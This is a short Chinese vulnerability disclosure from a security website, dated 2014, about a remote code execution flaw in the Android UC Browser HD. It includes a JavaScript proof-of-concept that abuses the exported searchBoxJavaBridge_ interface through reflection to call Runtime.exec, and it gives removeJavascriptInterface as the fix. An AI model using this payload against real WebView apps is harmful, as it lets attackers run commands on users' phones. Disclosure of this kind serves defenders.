首页 > 安全 > 网站安全 >

UC浏览器HD版本远程代码执行漏洞

2014-04-28

浏览器来说这种问题还是需要修补的导出searchBoxJavaBridge_好像是跟google的搜索框相关的。在android 4 0手机上测试实际存在,4 2以上版本不存在function execute(cmdArgs){return searchBoxJavaBridge_ get

浏览器来说这种问题还是需要修补的
导出searchBoxJavaBridge_好像是跟google的搜索框相关的。在android 4.0手机上测试实际存在,4.2以上版本不存在
function execute(cmdArgs)

{

return searchBoxJavaBridge_.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);

}

测试页面:http://drops.wooyun.org/webview.html
参见: http://www.2cto.com/Article/201309/241271.html
漏洞证明:
1.jpg
修复方案:
需要把这个接口删除,调用removeJavascriptInterface方法
http://www.2cto.com/Article/201404/296370.html
相关文章
最新文章
热点推荐